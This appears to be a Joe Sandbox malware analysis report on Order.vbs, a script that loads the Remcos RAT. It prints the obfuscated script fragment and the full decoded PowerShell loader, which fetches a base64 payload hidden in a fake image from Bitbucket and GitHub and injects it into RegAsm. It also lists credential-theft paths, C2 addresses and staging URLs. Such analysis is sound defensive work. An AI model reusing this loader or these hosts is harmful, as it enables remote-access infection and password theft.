k#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#ge#z#bz#hm#zwbm#gq#cwbn#c8#d#bl#hm#d#bp#g4#zw#v#gq#bwb3#g4#b#bv#ge#z#bz#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#
bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/akiseawueji/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.3509300667.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042C3C6 cpuid 8_2_0042C3C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,8_2_0040A7D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00444161
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_004441AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00444247
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_004442D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_0043D32C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00444524
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0044464D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00444754
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00444821
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_0043CEC5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00443EE9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00413BCC GetLocalTime,8_2_00413BCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00413CEA CreateThread,GetComputerNameExW,GetUserNameW,8_2_00413CEA
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7436, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_00407EC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_00407FDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db 8_2_00407FDE

              Remote Access Functionality

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-MBKA6A
              Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7436, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe 8_2_00403B0B
              MITRE ATT&CK Matrix (listed per tactic column; bracketed numbers are the count badges shown beside matched techniques)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
              Resource Development: [221] Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
              Execution: [11] Windows Management Instrumentation; [1] Native API; [1] Exploitation for Client Execution; [3] Command and Scripting Interpreter; [2] Service Execution; [2] PowerShell; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
              Persistence: [221] Scripting; [1] DLL Side-Loading; [1] Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
              Privilege Escalation: [1] DLL Side-Loading; [1] Access Token Manipulation; [1] Windows Service; [212] Process Injection; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
              Defense Evasion: [1] Deobfuscate/Decode Files or Information; [3] Obfuscated Files or Information; [1] Software Packing; [1] DLL Side-Loading; [11] Masquerading; [41] Virtualization/Sandbox Evasion; [1] Access Token Manipulation; [212] Process Injection; HTML Smuggling; Dynamic API Resolution
              Credential Access: [1] OS Credential Dumping; [2] Credentials In Files; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
              Discovery: [1] System Time Discovery; [1] Account Discovery; [1] System Service Discovery; [3] File and Directory Discovery; [44] System Information Discovery; [41] Security Software Discovery; [41] Virtualization/Sandbox Evasion; [3] Process Discovery; [1] Application Window Discovery; [1] System Owner/User Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
              Collection: [11] Archive Collected Data; [3] Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
              Command and Control: [12] Ingress Tool Transfer; [21] Encrypted Channel; [1] Non-Standard Port; [1] Remote Access Software; [2] Non-Application Layer Protocol; [13] Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
              Impact: [1] System Shutdown/Reboot; [1] Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
              Behavior Graph ID: 1538690  Sample: Order.vbs  Start date: 21/10/2024  Architecture: WINDOWS  Score: 100

              Sample-level network contacts: s3-w.us-east-1.amazonaws.com, raw.githubusercontent.com, 7 other IPs or domains
              Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures

              Process tree, with the network contacts and signatures the graph attaches to each node:

              • wscript.exe (started)
                Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
                • powershell.exe (started)
                  Signatures: Suspicious powershell command line found; Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading
                  • powershell.exe (started)
                    Network: raw.githubusercontent.com 185.199.108.133:443 from local port 49789 (FASTLY US, Netherlands); bitbucket.org 185.166.143.48:443 from local port 49758 (AMAZON-02 US, Germany); s3-w.us-east-1.amazonaws.com 52.217.161.161:443 from local port 49764 (AMAZON-02 US, United States)
                    Signatures: Writes to foreign memory regions; Injects a PE file into a foreign process; Loading BitLocker PowerShell Module
                    • RegAsm.exe (started)
                      Network: 154.216.17.141:5922 from local port 49805 (SKHT-AS Shenzhen Katherine Heng Technology Information Co, Seychelles); geoplugin.net 178.237.33.50:80 from local port 49812 (ATOM86-AS ATOM86 NL, Netherlands)
                      Signatures: Detected Remcos RAT; Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 2 other signatures
                      • conhost.exe (started)
                  • conhost.exe (started)
              • svchost.exe (started)
                Network: 127.0.0.1
              Antivirus detection (Source / Detection / Scanner / Label / Link)
              Order.vbs    13%    ReversingLabs
              All other scanned categories: No Antivirus matches
              Contacted domains (Name / IP / Active / Malicious / Antivirus Detection / Reputation)
              s3-w.us-east-1.amazonaws.com      52.217.161.161    true     true     -    unknown
              bitbucket.org                     185.166.143.48    true     true     -    unknown
              bg.microsoft.map.fastly.net       199.232.214.172   true     false    -    unknown
              raw.githubusercontent.com         185.199.108.133   true     true     -    unknown
              geoplugin.net                     178.237.33.50     true     false    -    unknown
              ax-0001.ax-msedge.net             150.171.28.10     true     false    -    unknown
              bbuseruploads.s3.amazonaws.com    unknown           unknown  true     -    unknown

              Contacted URLs (Name / Malicious / Antivirus Detection / Reputation)
              http://geoplugin.net/json.gp    false    URL Reputation: safe    unknown
              https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417    true    -    unknown
              https://raw.githubusercontent.com/IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt    true    -    unknown
              Contacted public IPs (IP / Domain / Country / ASN / ASN Name / Malicious)
              154.216.17.141     unknown                         Seychelles       135357    SKHT-AS Shenzhen Katherine Heng Technology Information Co    true
              52.217.161.161     s3-w.us-east-1.amazonaws.com    United States    16509     AMAZON-02 US                                                  true
              185.166.143.48     bitbucket.org                   Germany          16509     AMAZON-02 US                                                  true
              185.199.108.133    raw.githubusercontent.com       Netherlands      54113     FASTLY US                                                     true
              178.237.33.50      geoplugin.net                   Netherlands      8455      ATOM86-AS ATOM86 NL                                           false

              Other contacted IP: 127.0.0.1
              Joe Sandbox version: 41.0.0 Charoite
              Analysis ID: 1538690
              Start date and time: 2024-10-21 17:04:10 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 6m 27s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of new started processes analysed: 15
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: Order.vbs
              Detection: MAL
              Classification: mal100.rans.spre.troj.spyw.expl.evad.winVBS@10/13@4/6
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 50
              • Number of non-executed functions: 139
              Cookbook Comments:
              • Found application associated with file extension: .vbs
              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
              • Excluded IPs from analysis (whitelisted): 93.184.221.240, 184.28.90.27
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
              • Execution Graph export aborted for target powershell.exe, PID 1880 because it is empty
              • Not all processes were analyzed; the report is missing behavior information
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: Order.vbs
              Time / Type / Description
              11:05:13    API Interceptor    41x Sleep call for process: powershell.exe modified
              11:05:32    API Interceptor    2x Sleep call for process: svchost.exe modified
              11:05:59    API Interceptor    1070640x Sleep call for process: RegAsm.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        185.166.143.48https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exeGet hashmaliciousUnknownBrowse
                                                                          Z2tJveQl3B.exeGet hashmaliciousUnknownBrowse
                                                                            70973273827.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              ip4.cmdGet hashmaliciousUnknownBrowse
                                                                                Doc047892345y.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                    849128312.cmdGet hashmaliciousUnknownBrowse
                                                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                        OTO2wVGgkl.exeGet hashmaliciousUnknownBrowse
                                                                                          https://tiotapas.com.auGet hashmaliciousUnknownBrowse
                                                                                            185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                            178.237.33.50rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • geoplugin.net/json.gp
